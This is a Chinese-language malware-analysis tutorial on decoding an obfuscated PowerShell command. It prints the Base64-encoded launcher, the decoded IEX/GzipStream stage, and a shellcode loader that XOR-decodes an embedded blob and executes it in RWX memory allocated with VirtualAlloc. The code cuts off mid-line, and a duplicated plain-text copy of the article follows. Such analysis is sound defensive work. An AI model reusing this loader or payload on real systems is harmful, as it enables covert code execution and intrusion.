Powershell混淆代码的解码过程
字数 539 2025-08-05 00:16:39

PowerShell混淆代码的解码过程详解

1. PowerShell混淆技术概述

PowerShell混淆技术主要用于绕过安全检测和日志记录,常见的混淆方法包括:

  • Base64编码
  • 字符串反转
  • 变量重命名
  • 代码压缩
  • 加密算法

微软在高版本PowerShell中增加了日志记录功能(如Transcription、ScriptBlock日志),攻击者需要通过混淆来规避检测。

2. 关键参数解析

-EncodedCommand参数

-EncodedCommand
  Accepts a base64-encoded string version of a command. Use this parameter
  to submit commands to Windows PowerShell that require complex quotation
  marks or curly braces.

此参数用于执行Base64编码的命令,可以封装复杂字符串,避免特殊字符被错误解析。

其他常见参数

  • -nop (NoProfile): 不加载PowerShell配置文件
  • -w hidden (WindowStyle Hidden): 隐藏执行窗口
  • -exec bypass: 绕过执行策略限制

3. 解码过程详解

3.1 初始Base64解码

原始混淆代码示例:

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWAA3ADMATwBpAFMAQgBQACsASABQADgASwBQAHEAUgBLAHEAVABXAGUARQBjADAAbQBlADcAVgBWAGkAdwBxAEsAQwBrAG4ARQAzADcAbABVAGEAcABnAFoARQBRAE0ARAB3AGkAQwBRADIALwAzAGYAcgAwAEgATgBaAFcAKwB6ADkAMgA3AFYAKwA3ADUAVwBVAFEANAB6ADMAVAAzAGQAegB6AHoAZAAwADUAaQBVAFgANQBnADgAZABEAEQAWABmAFUASwBGAGkAeABrAE4ASQA4AGQAbgBRAHEATgBVAE8AdQAvADYARwBoAGMAKwBDADEALwBLAHAAWABYAE0ATQBNACsAbgA4ADgARwBUAFQAZgBsAFQARQBQAHIANABDAFIARQBTADAAaQBnAFMALwBpAHkAZAAzAGEARQBRAGUAVQBMAGwAZgBJAC8AQwBKADgAOABuAHMAVQB1AHIAUQB2AEcAUwBDADEASQBTAGgAMQBRADgATwB5AHUAZABGAFYATQB4AGkAOQBDAGEAUABqAEgARQBuAFQAMQA5ADgAaQBqAGYAKwBDAFMAQwBqAFMAbwBQAGMAaABCADAAZgBRADgANQA3AFAASABUAHAAMAA0AGMAaABwAFQAeAB3ADMAdQB0AFIANwBrAGMAUgBkAFMAegBYAEkAZABHAEYAVgBIADQASwBzAHcAMwBOAEsAUQBYAHQAOQBhAFcAWQBpADcAOABLAFoAdwAvADEAWABxAHUAYgB5AEgAMwBLAEoAWgAxAEUATgA1AEEAUQBEAEkAagArAGQAcgBJAHgAeQBpAFAAbwBHAFkARwByAHMATQByADUAVAAvACsASwBJAHMAUABGADUAZQBQAE4AVwBVAFgASQB6AGUAcQBsAE0AMABzADQAdABTAHIARQBkAGMAdABpADgASQAzAE0AZAA5AHcAawBnAFcAMABVAHQAWQBkAEgAUABxAFIAdgArAGEAMQB1AGMATwBrAFIAbQAxAGEAZQBHADgAVQB6AHUAcwBIADMAOAB2AGkATQBUAEkANwBRAEIARABIAHoANABQAE0AcgBSADUAMABLAG0AVQBZADMAZwBFADIAOABnAEgARABjAGwAVgA0AHkAUABkADcAZQBIAHcAVQB2AHIAeAA2AE0ANAA0AFoAZAB6AHgAYQAwAHgAaQBuAG8AUgArAFkATgBOAHcANwBtAEUAYQAxAFAAbQBMAEUAcABXAE8ANgBCAHIAVgB5AEIATQBmAEgANwBMAEkASQBUAG8AUwBVAHgAeQBFAFQAVAByADYAQQAzAHQANQAvAHAAcABWAHoARgByAHQAdQBGAGUAdwArAC8ASwByAGQAeAA0AHAAQgBrAHgATwA0AHYANgBwAFUAZQBhAHMARQBVAG4AYwA4AEYASwB0AEgAVAB2AHcASwBIAEgAcgBCAG0ANABNADUAQwBPAGMASAA3ADkAKwBRAFMANABUAGYARAB3AFEAVABTADkAOQBLADcAMQBDAFYAVQBKAGYAYQBpAE4ATQBuAEQAdgBpACsANABXAHIAcAA3AE8AeQBoAEcARgBLAEkAcAAzAEwAbgBSADAANgBoADkAMQBtAG8AVgB3AFUAZABuAEUARABjAEQANwBQADgATwBDAGQAaABUAE0AWABIAHYAOAAvAG4AcwBPADEASgBNADYAcgArADEATgBEAGwAUwBlAHUAbwBjAHoAaQBlAGcAeAArAGYAaABZAGUAWgA3ADUARABIADAAcABsAFkATwByAEkAbgBuADMAKwB5AFkAcwBjAGwATgBNAHoAWABmADUANABOAFgAYgBwADIARwBPADEAbQBEAEgAawBPAFAAaABHACsAOAB0ADYAWgAwAGIAVgBMAEMAegB4AHEASgB6AEUARAAvAEsAeQBVAGoAdwB1AFUAZABJAC8AbwBsAEgATgBBAEgAMwA1AFUAVQB6AHkASAB2ACsAcQAyAEQAOAA3AEoARwBNADQAOQBBAHEAKwBBAEUAdQBMADMAegBoAHoATwBzAEYATABXAG0ARQA0ADkAdwBPAC8AdwBEAGoAUQA5AFgAMABPAGEAMABaAFAAMABNAGIAVwB5ADAAKwA3ADUAZQA4ADcAbABqAG8AdQBpAHEAQwByAGMAeABaAEQAbgB1AEMAcQBZAEYATABtAFUAVgBBAFcAWgBSAGMANQB4AFMAWQA2ADUAWAB3AHoATABmADcAdQByAHgAeQA1ADMATQBJAHIANAB5AGQAeQBqACsAQQA2AGsAeAA2ADAANwBQAG8ATwBNAGkAVABHAGMATABzAEEAdwBNAFEATwBLAEgAZQBUAG0AcQBGAFMARgB2AGsATgBvAE8AegBNAGQAKwArAFIAQwArAFYAMQBNAE8AcwBoADEASQBlAFgAQQAwAGgANwBPAEIARwBaAHkATABFAHkAZQBjAHkAWQBrADEAWAAvAHkAUQA2AHkAWgBsAEcAdABlADQARgBJAFAAcABJAHMAcQBwAEwAcgBJAGgAcABwAHoAegBLAGkAQwBiAHMAaQBtAHAAUAB3AHYAYgBwAC8AeQA1AEoAQQBVAE8AVgBZAG4AawBOADQANABEAFEAUQB3AFgAWgA5AFgAaABaAGsAVABjAHEAaAByADUAZQBvAFAAeABQAHYAdgAzAFAAdQArAHgASAB6AG4AWgBpAGUAawB4ADQATwBzAEYASQBuADQAMABNADUANABuAGkANgBGAEoATQA0AHYAbAA4ACsAdgBXAEIAYgBJAGgAUgB4AFEAVQAwAFAAZgBhADYATwBJAFgAagBYAE4AbwBvAHgAVgB5AHQASgAxAHYATgBNAHkAZgBYAHQALwBGAGYAYQBVAHYAZAByAGYAOQBaAFUASgBQAEgAdAA0AHAASgAyAHEAagBFAGEARABjAGQAQQBlAGoANwBBAFMAMwA5ADcAMQA2ADQATwAxAGQAbgAvAGQAYgBjAFoASgByAE0AVwBUAGQAbAAxAFMANgB5AEQAMwBzAHUAcwBwAGEAMgAxAC8ANgB5ADgAdgBZADYAOQA1AFMAUQBKAHQAYgA4AEIAYwA5AEgASABYAGoANwByAGEAdgBpAHYAMwBHAHoAdABmAHYAYgBLAGQAbQA2AE8AZABnAC8ANgA5AGwAVgB4AGEAQwAwADMAOQBhAFAAWABVAFoAbgA4AFcAcQBiAGwAOABYADkAdQAzADEAVgAzAG4AeABvAGYAeABiADkAcQArADQAdwA5AEEANwAvAG8AcQBZAE8AMgBFAE4ASwBrAHkAdQBLAEsATABFAFUANABrAGYAawAyAFIAbgBXAGIARAAyAFEAZQB6AGYAdABtAGIAWgBjAFoAbwBwAGcAUwBHAHkAYwBqAEkAdQByAHgAWABCADgAWgBMAFEAKwBGAHAAbgBmAFQASABkAGEASgBFAEsAegBMAGIASwBkAEsAZABOAFEAdwBnAFQAawAyAHkAegBTAHMAMgB5AEUAeQB6AG4AZQBGAG4AbgB1AFcAeAA0ADcANAB4AEkAcwBQAGQAZABZAHUAOABOAEQATABWAGEAQQBJAE8AcQBaAG4AcABtACsAVQBWAFMAZgBGAEMAVABmAEQAQwBHAEcAWAA5AHAAZABFAEQAdQA3AHQANABiAGoAZgA3AHUAaQBtAEIAYgBaAE8AawBDAcwA3ACsATAA2AFYAawBNAGEAQQByAHgAcQBEAGQASgBXADAASABHAHQAQgBkAG0AUQBlAHAASQBUAEoAdAA2AFMAeABTAGsAagBTAGMAcABGADMANAA4AGsAMgBDAFQAdQA5AGEASwBDAGwAcQAwAGgAbQBlAGsAKwBUAFYAdgBkAGoAVgA3AGwAZABQAG8AOQA3AGsAeABsAGUAeQBZADIAVwBQAHAAOABHAGQANQBPADYAcABxAHQASgBmAFMASQBuAFgASgA0AG8AcgBjAG0AOQBTADQAYgAzADAANQB0AGUAVAB6AFoAaQAzAEEAcwA4AE8AWQAwAE0ASgBiAFcANwBCAE0ANQBqAFgARQArAG4AVQA5AG4AZwBKAE4ASABuADMAYgBHADIAbABDAFUAeQBOAHAAOQBKAGIAcQArAHcAQQBUAHIANwA1AFYAeABOAHIAZgA0ADQAVwBUAEYAbABPAEgASwBlAHQANgBxAFgAZABIAEMAeQAyAGkANgBaADAAVgBTAGwAbQB4AGUANgBpAE8AWgBxAHcAbAAvAFcAOQAvADUAMAAyAFoATwBIAEsAbgBCAGwANQBRAFgAMgBrAGkAbQAzAHUARQA4AGMAYQAwADQAYwBQAE0AZQAzAFMAKwA5AFMAUQBtAHkAMgB3ADQAdABWADAAbQBYAEUAdwAzADEAOAB1ADUAbwBIACsANQBXAHQAOQBWAEcAeQBDAFQAdgBtAC8AeAArAHoAWgBXAFAAdwBRAHQAdgBrAE4AeQB5ADUASAA5AFUATgBIAG0ARwBwAFAAbABSADcAYgBSAHYAcwAwADMAWgBqAHQAVgB2ADIAQgBtAG0AWAB0AFMAWAB3AGwAUwAyAFoAeQByAHIAZQBnAEoATgBHAGMASQBtAFkAMgBzAEIAeQBTADEAcgBCAFcAdABlAGIANwBhAHoARwBzAHQATgB1AFIAQgBwAEsALwBvAEUASAA4AEwAegBlAFEAbQAwAEMAUABEAFgAbgB4AGsAaAA3AEEAVAA3AFgAbwA2ADMAVwAwAEwAZABFADQAUgA4ADMAVQByAGMASABQAEUAdwA4ADQAQQB2AHcAeQBQAG4AQQBCAHMAawB1AEEAcAA1AG0AZQBsAGYATABqAEoAeQByAEsAVQBkAGgAdQArAEQAcQA1AGQAcgBkAGQAZQA2AGQANQB0AEQAYQB6AHEATABWAHgANgBZAGUARAB5AFgAKwBnAHAAVwBOAGIAaQBnAGIAMwArAGkAbAA4AEQALwBHAFYAcAA0AGYAOABIAHoATwBxADkASABhAEQANgBHAC8AUwBQAE0ANwArADMAYwBCAC8AaQA5AGMATAByAHoAVwBHADYAZwB5AFUATQBEAHkAKwBRADgAZgB4AFAAegBlAGYAMQAxADUATwBFADgAZgBUADMAMwBhADYALwB1AEYAbABZAEkAMQBxAFoAWABYAHIAbQBKAGwAagA5ADUAVQByAEoAOAAxAFAAegBvAEsAbwB3ADEAeQBvAFoASgBCAEEAMwBPADYAZgBsAFEALwBWAEkAOQB0AHkASgAzAHYANQBCAHEAVgB5AHYAdQBkADgAegBNAE4ARwBYAFcAaABxADQAUwArADgAMQBTADAAWgBkAGYAMQBjAGQANAA0AC8AYQBTAEQAZwBUAGIAdQAwAEYAdwA5AHcAdQBVADAAaABhAEgAVQBlAEgAYwBrAEMAcQArAEMAMABDADAAZABZAHIATABpADkAYgBwAG8ATABvADQAUgBuAG4AcQBzAGsAKwBDAG4AVAB5AHMASQByAC8AbwBHAHgAQgBGAGwATgB0ADkAVQBoAFgAbwBxADEAZQB2ADEALwBMADkAWgBGADAAdQAvAEQAawB2AEgARAA3AEwASwBxADcAbABxADMAbAB5ADkAOABlAFQAdABUAG0ANgB4AGsAMwBoAEUAUAA0AHkAWgBSAC8AKwBIAEIALwBEAGQAcAB2ADgAWgAyAGgAeQA4AG8AagA5ADcAaABhADUAdwA2AEgAMgA4AHgARgBMADUAUwA2AG0AawByAFkAVQAzADgANQBIAHoAQQBsADgAZgBkAEMAZABjAEYAOQB5AEwAZwBPAGIAOABZAHUAdABiADgASwBsAFMAMwBMADIAVgBjAHkAUQBLAG0AcgBJAFEAegBwAEgAdwBUAGIAaQBBADgATwBSAEkAYQBzAEQAMwBTAG0AagBIACsAVQBVAHMASABEADYALwB2AGcAbwBKAGMAZwA2AEsAWAA0AFUAeAB4AFIAVABhADUANAB1AEIAYgB3AEYATABLAGYAUgBUAHUAZQBuAEMAUwBDADQATQBjADMAOABCAGsAdwBzAC8ANQA4ADgATgBBAEEAQQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBu

解码方法:

echo -n "JABzAD0ATgBlAHcALQBPAGIAagBlAGM..." | base64 -D

解码后得到:

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAA..."));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

3.2 GZIP解压缩

解码后的代码显示使用了GZIP压缩并Base64编码,可通过以下特征识别:

  • 以"H4sIAAAA"开头
  • 使用IO.Compression.GzipStream进行解压

解压方法:

echo -n "H4sIAAAA..." | base64 -D | gunzip

解压后得到PowerShell加载器代码:

Set-StrictMode -Version 2
$DoIt = @'
function func_get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
    return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDGZ5dEUjSIgEoJKXg6X5qzPHl1iO1buG+VuC6rtpnoH41qg2+GNzdpA2TdUXolH+tJ/mUO65byu/dx/NX5qstEl/1PmpWeplO0fErSN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDYWxqZhoYc3dhcQouKSP4VpuFSK7RM6YYoEWg5NP6S9kDRy7v1+9l6XvafZkG84FqmRudQNMHNVeEM9WPDUrPGzBH2tZZpMkasn6vGEqpNpUUjihiQnkd4eovJ5UwNNWBtXdWBhJ7ISLKZq6AwYNoC+D0hbjBx8myxeQl7sj9hecL1KkJuU2mb+lDhPXgV+QPHbyNyxgW2LAdGXKMGjAwRDJfHspTfpmzbTfjpGaZreF0vnnOmPUrC+QoYqNMVtUlkoRz/PZlPTWZ+1fLS6OregYTdGzqEFvmcEtE2vxec7qhtWIjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIXGg0RGw0bEg0SGiMjIyMg')
for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([
PowerShell混淆代码的解码过程详解 1. PowerShell混淆技术概述 PowerShell混淆技术主要用于绕过安全检测和日志记录,常见的混淆方法包括: Base64编码 字符串反转 变量重命名 代码压缩 加密算法 微软在高版本PowerShell中增加了日志记录功能(如Transcription、ScriptBlock日志),攻击者需要通过混淆来规避检测。 2. 关键参数解析 -EncodedCommand参数 此参数用于执行Base64编码的命令,可以封装复杂字符串,避免特殊字符被错误解析。 其他常见参数 -nop (NoProfile): 不加载PowerShell配置文件 -w hidden (WindowStyle Hidden): 隐藏执行窗口 -exec bypass : 绕过执行策略限制 3. 解码过程详解 3.1 初始Base64解码 原始混淆代码示例: 解码方法: 解码后得到: 3.2 GZIP解压缩 解码后的代码显示使用了GZIP压缩并Base64编码,可通过以下特征识别: 以"H4sIAAAA"开头 使用 IO.Compression.GzipStream 进行解压 解压方法: 解压后得到PowerShell加载器代码: